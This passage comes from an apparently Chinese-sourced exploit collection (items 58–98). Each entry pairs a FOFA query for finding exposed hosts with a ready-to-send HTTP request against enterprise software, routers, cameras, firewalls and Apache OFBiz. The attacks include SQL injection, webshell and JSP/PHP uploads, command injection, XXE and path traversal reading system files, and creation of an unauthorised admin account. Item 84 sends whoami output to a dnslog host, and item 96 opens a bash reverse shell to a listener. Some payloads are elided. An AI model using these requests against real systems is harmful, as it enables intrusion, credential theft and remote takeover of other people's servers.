User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Entsoft customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate Lianaiyun (one-face-pass) smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed if lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the directory it is written to, and the fileType parameter gives the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec campus mobile service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (Baiwei) flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is shown below; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. TOSEI (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity MingYu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity MingYu security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin Wangshen SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

